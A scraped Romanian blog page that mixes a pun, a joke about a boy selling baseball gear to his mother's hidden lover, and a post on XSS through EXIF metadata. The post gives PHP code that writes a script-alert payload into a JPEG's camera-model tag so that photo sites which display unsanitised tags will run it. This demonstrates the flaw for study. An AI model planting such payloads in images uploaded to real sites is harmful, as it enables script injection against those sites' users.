Moluscă (subst.fem) = persoană care frecventează molurile (engl. mall) şi te uscă / usucă de bani.
Ridica-ma la cer
Bau
O femeie avea un amant care o vizita cand sotul era plecat la serviciu.
Intr-una din zile fiul ei de 9 ani se ascunde in sifonierul din dormitor. Ea il primeste pe amant, sotul ei vine casa pe neasteptate, asa ca il ascunde pe amant tot in sifonier.
Baietelul spune: – E intuneric aici.
Barbatul sopteste: – Da, este.
Baiatul: – Am o minge debaseball.
Barbatul: – Foarte bine.
Baiatul: – Vrei s-o cumperi?
Barbatul: – Nu, multumesc.
Baiatul: – Tata e afara.
Barbatul: – OK, cat costa?
Baiatul: – $250.
Peste o saptamana, cei doi nimeresc din nou impreuna in sifonier.
Baiatul: – E intuneric aici.
Barbatul: – Da, este.
Baiatul: – Am o manusa de baseball.
Barbatul: – Cat vrei pe ea?
Baiatul: – $750.
Barbatul: – Fie.
Dupa cateva zile, tatal ii spune baiatului:
– Ia-ti mingea si manusa si hai afara sa jucam baseball.
Baiatul: – Nu pot. Le-am vandut.
Tatal: – Si cu cat le-ai vandut?
Fiul: – $1000.
Tatal spune: – Nu e frumos sa-ti jefuiesti prietenii asa.
Te duc la biserica, trebuie sa te spovedesti.
Se duc la biserica si tatal il pune pe baietel sa intre in confesional si inchide usa:
Baiatul: – E intuneric aici.
Preotul: – Iar incepi?
XSS folosind Exif metadata
In continuarea postului despre XSS folosind headerele de HTTP, azi va prezint XSS folosind exif metadata.
Sunt multe situri de fotografie care afiseaza cateva din tagurile de exif ale imaginilor uploadate de catre utilizatori (modelul camerei, distanta focala etc). Daca informatiile preluate din headerele de jpeg nu sunt sanitizate corespunzator, aceste situri sunt vulnerabile la atacuri de tip XSS.
Am facut un mic test. Pentru asta aveam nevoie sa gasesc o modalitate de a modifica exif metadata. Dupa un mic research, am gasit doua variante. Una dintre ele e sa folosesc ImageMagick cealalta e o clasa PHP, numita PEL (PHP Exif Library). Am optat pentru libraria PHP.
Pentru inceput, sa modificam tagul de camera model din exif. Downloadam libraria in folderul pel. Luam o imagine de test (test.jpg) caruia ii modificam tagul model cu textul “EOS 20D <script>alert(“XSS”)</script>”. Imaginea modificata o salvam cu numele xss_test_image.jpg.
<?php
require_once(‘pel/PelJpeg.php’);
$jpeg = new PelJpeg(‘test.jpg’);
$ifd0 = $jpeg->getExif()->getTiff()->getIfd();
$entry = $ifd0->getEntry(PelTag::MODEL);
$entry->setValue(‘EOS 20D <script>alert(“XSS”)</script>’);file_put_contents(‘xss_test_image.jpg’, $jpeg->getBytes());
?>
Acum facem un alt scriptulet cu care citim exif metadata si o afisam:
<?php
$exif = exif_read_data(‘xss_test_image.jpg’, 0, true);
foreach ($exif as $key => $section) {
foreach ($section as $name => $val) {
echo $key,’.’,$name,’: ‘, htmlspecialchars($val),”<br />\n”;
}
}?>
Observam ca tagul IFD0.Model a fost modificat cu succes. Happy hacking!
Puteti downloada imaginea modificata aici.


